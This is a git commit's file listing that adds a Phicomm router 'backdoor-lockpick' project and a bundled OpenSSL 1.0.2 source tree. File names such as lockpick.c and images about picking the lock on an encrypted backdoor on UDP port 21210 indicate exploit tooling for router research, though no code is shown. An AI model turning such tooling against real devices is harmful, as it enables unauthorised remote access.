 .../openssl-1.0.2/test/md5test.c              |     1 +
 .../openssl-1.0.2/test/mdc2test.c             |     1 +
 .../openssl-1.0.2/test/methtest.c             |   107 +
 .../openssl-1.0.2/test/ocsp-tests/D1.ors      |    32 +
 .../test/ocsp-tests/D1_Cert_EE.pem            |    38 +
 .../test/ocsp-tests/D1_Issuer_ICA.pem         |    27 +
 .../openssl-1.0.2/test/ocsp-tests/D2.ors      |    32 +
 .../test/ocsp-tests/D2_Cert_ICA.pem           |    26 +
 .../test/ocsp-tests/D2_Issuer_Root.pem        |    21 +
 .../openssl-1.0.2/test/ocsp-tests/D3.ors      |    38 +
 .../test/ocsp-tests/D3_Cert_EE.pem            |    31 +
 .../test/ocsp-tests/D3_Issuer_Root.pem        |    83 +
 .../test/ocsp-tests/ISDOSC_D1.ors             |    32 +
 .../test/ocsp-tests/ISDOSC_D2.ors             |    32 +
 .../test/ocsp-tests/ISDOSC_D3.ors             |    38 +
 .../test/ocsp-tests/ISIC_D1_Issuer_ICA.pem    |    27 +
 .../test/ocsp-tests/ISIC_D2_Issuer_Root.pem   |    21 +
 .../test/ocsp-tests/ISIC_D3_Issuer_Root.pem   |    41 +
 .../test/ocsp-tests/ISIC_ND1_Issuer_ICA.pem   |    29 +
 .../test/ocsp-tests/ISIC_ND2_Issuer_Root.pem  |    23 +
 .../test/ocsp-tests/ISIC_ND3_Issuer_Root.pem  |    25 +
 .../openssl-1.0.2/test/ocsp-tests/ISOP_D1.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/ISOP_D2.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/ISOP_D3.ors |    38 +
 .../test/ocsp-tests/ISOP_ND1.ors              |    10 +
 .../test/ocsp-tests/ISOP_ND2.ors              |    10 +
 .../test/ocsp-tests/ISOP_ND3.ors              |    10 +
 .../openssl-1.0.2/test/ocsp-tests/ND1.ors     |    10 +
 .../test/ocsp-tests/ND1_Cert_EE.pem           |    36 +
 .../test/ocsp-tests/ND1_Issuer_ICA.pem        |    29 +
 .../openssl-1.0.2/test/ocsp-tests/ND2.ors     |    10 +
 .../test/ocsp-tests/ND2_Cert_ICA.pem          |    29 +
 .../test/ocsp-tests/ND2_Issuer_Root.pem       |    23 +
 .../openssl-1.0.2/test/ocsp-tests/ND3.ors     |    10 +
 .../test/ocsp-tests/ND3_Cert_EE.pem           |    34 +
 .../test/ocsp-tests/ND3_Issuer_Root.pem       |    25 +
 .../openssl-1.0.2/test/ocsp-tests/WIKH_D1.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WIKH_D2.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WIKH_D3.ors |    38 +
 .../test/ocsp-tests/WIKH_ND1.ors              |    10 +
 .../test/ocsp-tests/WIKH_ND2.ors              |    10 +
 .../test/ocsp-tests/WIKH_ND3.ors              |    10 +
 .../openssl-1.0.2/test/ocsp-tests/WINH_D1.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WINH_D2.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WINH_D3.ors |    38 +
 .../test/ocsp-tests/WINH_ND1.ors              |    10 +
 .../test/ocsp-tests/WINH_ND2.ors              |    10 +
 .../test/ocsp-tests/WINH_ND3.ors              |    10 +
 .../test/ocsp-tests/WKDOSC_D1.ors             |    32 +
 .../test/ocsp-tests/WKDOSC_D2.ors             |    32 +
 .../test/ocsp-tests/WKDOSC_D3.ors             |    38 +
 .../test/ocsp-tests/WKIC_D1_Issuer_ICA.pem    |    27 +
 .../test/ocsp-tests/WKIC_D2_Issuer_Root.pem   |    21 +
 .../test/ocsp-tests/WKIC_D3_Issuer_Root.pem   |    41 +
 .../test/ocsp-tests/WKIC_ND1_Issuer_ICA.pem   |    29 +
 .../test/ocsp-tests/WKIC_ND2_Issuer_Root.pem  |    23 +
 .../test/ocsp-tests/WKIC_ND3_Issuer_Root.pem  |    25 +
 .../openssl-1.0.2/test/ocsp-tests/WRID_D1.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WRID_D2.ors |    32 +
 .../openssl-1.0.2/test/ocsp-tests/WRID_D3.ors |    38 +
 .../test/ocsp-tests/WRID_ND1.ors              |    10 +
 .../test/ocsp-tests/WRID_ND2.ors              |    10 +
 .../test/ocsp-tests/WRID_ND3.ors              |    10 +
 .../test/ocsp-tests/WSNIC_D1_Issuer_ICA.pem   |    27 +
 .../test/ocsp-tests/WSNIC_D2_Issuer_Root.pem  |    21 +
 .../test/ocsp-tests/WSNIC_D3_Issuer_Root.pem  |    41 +
 .../test/ocsp-tests/WSNIC_ND1_Issuer_ICA.pem  |    29 +
 .../test/ocsp-tests/WSNIC_ND2_Issuer_Root.pem |    23 +
 .../test/ocsp-tests/WSNIC_ND3_Issuer_Root.pem |    25 +
 .../openssl-1.0.2/test/pkcs7-1.pem            |    15 +
 .../openssl-1.0.2/test/pkcs7.pem              |    54 +
 .../openssl-1.0.2/test/pkits-test.pl          |   949 ++
 .../openssl-1.0.2/test/r160test.c             |    57 +
 .../openssl-1.0.2/test/randtest.c             |     1 +
 .../openssl-1.0.2/test/rc2test.c              |     1 +
 .../openssl-1.0.2/test/rc4test.c              |     1 +
 .../openssl-1.0.2/test/rc5test.c              |    57 +
 .../openssl-1.0.2/test/rmdtest.c              |     1 +
 .../openssl-1.0.2/test/rsa_test.c             |     1 +
 .../openssl-1.0.2/test/serverinfo.pem         |    16 +
 .../openssl-1.0.2/test/sha1test.c             |     1 +
 .../openssl-1.0.2/test/sha256t.c              |     1 +
 .../openssl-1.0.2/test/sha512t.c              |     1 +
 .../openssl-1.0.2/test/shatest.c              |     1 +
 .../openssl-1.0.2/test/smcont.txt             |     1 +
 .../openssl-1.0.2/test/smime-certs/ca.cnf     |    66 +
 .../test/smime-certs/mksmime-certs.sh         |    74 +
 .../openssl-1.0.2/test/smime-certs/smdh.pem   |    33 +
 .../openssl-1.0.2/test/smime-certs/smdsa1.pem |    47 +
 .../openssl-1.0.2/test/smime-certs/smdsa2.pem |    47 +
 .../openssl-1.0.2/test/smime-certs/smdsa3.pem |    47 +
 .../openssl-1.0.2/test/smime-certs/smdsap.pem |     9 +
 .../openssl-1.0.2/test/smime-certs/smec1.pem  |    22 +
 .../openssl-1.0.2/test/smime-certs/smec2.pem  |    23 +
 .../openssl-1.0.2/test/smime-certs/smroot.pem |    49 +
 .../openssl-1.0.2/test/smime-certs/smrsa1.pem |    49 +
 .../openssl-1.0.2/test/smime-certs/smrsa2.pem |    49 +
 .../openssl-1.0.2/test/smime-certs/smrsa3.pem |    49 +
 .../openssl-1.0.2/test/srptest.c              |     1 +
 .../openssl-1.0.2/test/ssltest.c              |     1 +
 .../openssl-1.0.2/test/tcrl                   |    78 +
 .../openssl-1.0.2/test/tcrl.com               |    88 +
 .../openssl-1.0.2/test/test.cnf               |    88 +
 .../openssl-1.0.2/test/test_padlock           |    64 +
 .../openssl-1.0.2/test/testca                 |    51 +
 .../openssl-1.0.2/test/testca.com             |    52 +
 .../openssl-1.0.2/test/testcrl.pem            |    16 +
 .../openssl-1.0.2/test/testenc                |    54 +
 .../openssl-1.0.2/test/testenc.com            |    66 +
 .../openssl-1.0.2/test/testfipsssl            |   113 +
 .../openssl-1.0.2/test/testgen                |    44 +
 .../openssl-1.0.2/test/testgen.com            |    58 +
 .../openssl-1.0.2/test/testp7.pem             |    46 +
 .../openssl-1.0.2/test/testreq2.pem           |     7 +
 .../openssl-1.0.2/test/testrsa.pem            |     9 +
 .../openssl-1.0.2/test/tests.com              |   397 +
 .../openssl-1.0.2/test/testsid.pem            |    12 +
 .../openssl-1.0.2/test/testss                 |   163 +
 .../openssl-1.0.2/test/testss.com             |   123 +
 .../openssl-1.0.2/test/testssl                |   223 +
 .../openssl-1.0.2/test/testssl.com            |   208 +
 .../openssl-1.0.2/test/testsslproxy           |    10 +
 .../openssl-1.0.2/test/testtsa                |   238 +
 .../openssl-1.0.2/test/testtsa.com            |   255 +
 .../openssl-1.0.2/test/testutil.h             |   118 +
 .../openssl-1.0.2/test/testx509.pem           |    10 +
 .../openssl-1.0.2/test/times                  |   113 +
 .../openssl-1.0.2/test/tocsp                  |   147 +
 .../openssl-1.0.2/test/tocsp.com              |   152 +
 .../openssl-1.0.2/test/tpkcs7                 |    48 +
 .../openssl-1.0.2/test/tpkcs7.com             |    59 +
 .../openssl-1.0.2/test/tpkcs7d                |    41 +
 .../openssl-1.0.2/test/tpkcs7d.com            |    52 +
 .../openssl-1.0.2/test/treq                   |    83 +
 .../openssl-1.0.2/test/treq.com               |    88 +
 .../openssl-1.0.2/test/trsa                   |    83 +
 .../openssl-1.0.2/test/trsa.com               |    99 +
 .../openssl-1.0.2/test/tsid                   |    78 +
 .../openssl-1.0.2/test/tsid.com               |    88 +
 .../openssl-1.0.2/test/tverify.com            |    65 +
 .../openssl-1.0.2/test/tx509                  |    78 +
 .../openssl-1.0.2/test/tx509.com              |    88 +
 .../openssl-1.0.2/test/v3-cert1.pem           |    16 +
 .../openssl-1.0.2/test/v3-cert2.pem           |    16 +
 .../openssl-1.0.2/test/v3nametest.c           |     1 +
 .../openssl-1.0.2/test/wp_test.c              |     1 +
 .../openssl-1.0.2/times/090/586-100.nt        |    32 +
 .../openssl-1.0.2/times/091/486-50.nt         |    30 +
 .../openssl-1.0.2/times/091/586-100.lnx       |    32 +
 .../openssl-1.0.2/times/091/68000.bsd         |    32 +
 .../openssl-1.0.2/times/091/686-200.lnx       |    32 +
 .../openssl-1.0.2/times/091/alpha064.osf      |    32 +
 .../openssl-1.0.2/times/091/alpha164.lnx      |    32 +
 .../openssl-1.0.2/times/091/alpha164.osf      |    31 +
 .../openssl-1.0.2/times/091/mips-rel.pl       |    21 +
 .../openssl-1.0.2/times/091/r10000.irx        |    37 +
 .../openssl-1.0.2/times/091/r3000.ult         |    32 +
 .../openssl-1.0.2/times/091/r4400.irx         |    32 +
 .../openssl-1.0.2/times/100.lnx               |    32 +
 .../openssl-1.0.2/times/100.nt                |    29 +
 .../openssl-1.0.2/times/200.lnx               |    30 +
 .../openssl-1.0.2/times/486-66.dos            |    22 +
 .../openssl-1.0.2/times/486-66.nt             |    22 +
 .../openssl-1.0.2/times/486-66.w31            |    23 +
 .../openssl-1.0.2/times/5.lnx                 |    29 +
 .../openssl-1.0.2/times/586-085i.nt           |    29 +
 .../openssl-1.0.2/times/586-100.LN3           |    26 +
 .../openssl-1.0.2/times/586-100.NT2           |    26 +
 .../openssl-1.0.2/times/586-100.dos           |    24 +
 .../openssl-1.0.2/times/586-100.ln4           |    26 +
 .../openssl-1.0.2/times/586-100.lnx           |    23 +
 .../openssl-1.0.2/times/586-100.nt            |    23 +
 .../openssl-1.0.2/times/586-100.ntx           |    30 +
 .../openssl-1.0.2/times/586-100.w31           |    27 +
 .../openssl-1.0.2/times/586-1002.lnx          |    26 +
 .../openssl-1.0.2/times/586p-100.lnx          |    26 +
 .../openssl-1.0.2/times/686-200.bsd           |    25 +
 .../openssl-1.0.2/times/686-200.lnx           |    26 +
 .../openssl-1.0.2/times/686-200.nt            |    24 +
 .../openssl-1.0.2/times/L1                    |    27 +
 .../openssl-1.0.2/times/R10000.t              |    24 +
 .../openssl-1.0.2/times/R4400.t               |    26 +
 .../openssl-1.0.2/times/aix.t                 |    34 +
 .../openssl-1.0.2/times/aixold.t              |    23 +
 .../openssl-1.0.2/times/alpha.t               |    81 +
 .../openssl-1.0.2/times/alpha400.t            |    25 +
 .../openssl-1.0.2/times/cyrix100.lnx          |    22 +
 .../openssl-1.0.2/times/dgux-x86.t            |    23 +
 .../openssl-1.0.2/times/dgux.t                |    17 +
 .../openssl-1.0.2/times/hpux-acc.t            |    25 +
 .../openssl-1.0.2/times/hpux-kr.t             |    23 +
 .../openssl-1.0.2/times/hpux.t                |    86 +
 .../openssl-1.0.2/times/p2.w95                |    22 +
 .../openssl-1.0.2/times/pent2.t               |    24 +
 .../openssl-1.0.2/times/readme                |    11 +
 .../openssl-1.0.2/times/s586-100.lnx          |    25 +
 .../openssl-1.0.2/times/s586-100.nt           |    23 +
 .../openssl-1.0.2/times/sgi.t                 |    29 +
 .../openssl-1.0.2/times/sparc.t               |    26 +
 .../openssl-1.0.2/times/sparc2                |    21 +
 .../openssl-1.0.2/times/sparcLX.t             |    22 +
 .../openssl-1.0.2/times/usparc.t              |    25 +
 .../openssl-1.0.2/times/x86/bfs.cpp           |    67 +
 .../openssl-1.0.2/times/x86/casts.cpp         |    67 +
 .../openssl-1.0.2/times/x86/des3s.cpp         |    67 +
 .../openssl-1.0.2/times/x86/dess.cpp          |    67 +
 .../openssl-1.0.2/times/x86/md4s.cpp          |    78 +
 .../openssl-1.0.2/times/x86/md5s.cpp          |    78 +
 .../openssl-1.0.2/times/x86/rc4s.cpp          |    73 +
 .../openssl-1.0.2/times/x86/sha1s.cpp         |    79 +
 .../openssl-1.0.2/tools/Makefile              |    59 +
 .../openssl-1.0.2/tools/c89.sh                |    15 +
 .../openssl-1.0.2/tools/c_hash                |     9 +
 .../openssl-1.0.2/tools/c_info                |    12 +
 .../openssl-1.0.2/tools/c_issuer              |    10 +
 .../openssl-1.0.2/tools/c_name                |    10 +
 .../openssl-1.0.2/tools/c_rehash              |   210 +
 .../openssl-1.0.2/tools/c_rehash.bak          |   210 +
 .../openssl-1.0.2/tools/c_rehash.in           |   210 +
 .../openssl-1.0.2/util/FreeBSD.sh             |     6 +
 .../openssl-1.0.2/util/add_cr.pl              |   123 +
 .../openssl-1.0.2/util/bat.sh                 |   134 +
 .../openssl-1.0.2/util/ck_errf.pl             |    64 +
 .../openssl-1.0.2/util/clean-depend.pl        |    58 +
 .../openssl-1.0.2/util/copy-if-different.pl   |    78 +
 .../openssl-1.0.2/util/copy.pl                |    70 +
 .../openssl-1.0.2/util/cygwin.sh              |   154 +
 .../openssl-1.0.2/util/deleof.pl              |     7 +
 .../openssl-1.0.2/util/deltree.com            |    34 +
 .../openssl-1.0.2/util/dirname.pl             |    18 +
 .../openssl-1.0.2/util/do_ms.sh               |    19 +
 .../openssl-1.0.2/util/domd                   |    38 +
 .../openssl-1.0.2/util/err-ins.pl             |    33 +
 .../openssl-1.0.2/util/extract-names.pl       |    26 +
 .../openssl-1.0.2/util/extract-section.pl     |    12 +
 .../openssl-1.0.2/util/files.pl               |    67 +
 .../openssl-1.0.2/util/fixNT.sh               |    14 +
 .../openssl-1.0.2/util/indent.pro             |   751 ++
 .../openssl-1.0.2/util/install.sh             |   108 +
 .../openssl-1.0.2/util/libeay.num             |  4414 +++++++
 .../openssl-1.0.2/util/mk1mf.pl               |  1319 ++
 .../openssl-1.0.2/util/mkbuildinf.pl          |    35 +
 .../openssl-1.0.2/util/mkcerts.sh             |   220 +
 .../openssl-1.0.2/util/mkdef.pl               |  1557 +++
 .../openssl-1.0.2/util/mkdir-p.pl             |    34 +
 .../openssl-1.0.2/util/mkerr.pl               |   811 ++
 .../openssl-1.0.2/util/mkfiles.pl             |   143 +
 .../openssl-1.0.2/util/mklink.pl              |    73 +
 .../openssl-1.0.2/util/mkrc.pl                |    71 +
 .../openssl-1.0.2/util/mkstack.pl             |   194 +
 .../openssl-1.0.2/util/openssl-format-source  |   148 +
 .../openssl-1.0.2/util/opensslwrap.sh         |    26 +
 .../openssl-1.0.2/util/perlpath.pl            |    35 +
 .../openssl-1.0.2/util/pl/BC-32.pl            |   139 +
 .../openssl-1.0.2/util/pl/Mingw32.pl          |   104 +
 .../openssl-1.0.2/util/pl/OS2-EMX.pl          |   120 +
 .../openssl-1.0.2/util/pl/VC-32.pl            |   416 +
 .../openssl-1.0.2/util/pl/linux.pl            |   104 +
 .../openssl-1.0.2/util/pl/netware.pl          |   532 +
 .../openssl-1.0.2/util/pl/ultrix.pl           |    38 +
 .../openssl-1.0.2/util/pl/unix.pl             |   443 +
 .../openssl-1.0.2/util/pod2man.pl             |  1184 ++
 .../openssl-1.0.2/util/pod2mantest            |    58 +
 .../openssl-1.0.2/util/pod2mantest.pod        |    15 +
 .../openssl-1.0.2/util/point.sh               |    10 +
 .../openssl-1.0.2/util/selftest.pl            |   201 +
 .../openssl-1.0.2/util/shlib_wrap.sh          |    97 +
 .../openssl-1.0.2/util/sp-diff.pl             |    80 +
 .../openssl-1.0.2/util/speed.sh               |    39 +
 .../openssl-1.0.2/util/src-dep.pl             |   147 +
 .../openssl-1.0.2/util/ssleay.num             |   370 +
 .../openssl-1.0.2/util/su-filter.pl           |   260 +
 .../openssl-1.0.2/util/tab_num.pl             |    17 +
 .../openssl-1.0.2/util/x86asm.sh              |    42 +
 3214 files changed, 756757 insertions(+)
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/.gitignore
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/README.md
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/helper.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/lib/libcrypto.a
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/lib/libtelnet.a
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/lockpick
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/lockpick.c
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/mk-libcrypto.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ACKNOWLEDGMENTS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES.SSLeay
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Configure
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/FAQ
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitConfigure
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/GitMake
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.DJGPP
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.MacOS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.NW
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.OS2
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.VMS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W32
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.W64
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.WCE
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/LICENSE
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GUSI_Init.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.hpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/ErrorHandling.hpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/GetHTTPS.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/OpenSSL.mcp.hqx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/TODO
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_GUSI_prefix.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_prefix.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/buildinf.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/mklinks.as.hqx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/opensslconf.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.org
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.shared
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/NEWS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/build.bat
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/cpy_tests.bat
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/do_tests.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/globals.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/readme.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/set_env.bat
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/PROBLEMS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ASN1
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ENGINE
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/TODO
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/VMSify-conf.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/WISHLIST.TXT
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/install-vms.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/mkshared.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/multinet_shr.opt
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_startup.com
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_undo.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_utils.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/socketshr_shr.opt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/tcpip_shr_decc.opt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/test-includes.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc.opt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc_log.opt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_vaxc.opt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.pl.in
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/app_rand.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-cert.srl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-key.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-req.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cert.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/client.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/crl2p7.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/cacert.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/index.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/private/cakey.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoCA/serial
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/demoSRP/srp_verifier.txt.attr
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dgst.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh1024.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh2048.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh4096.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh512.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-ca.pem
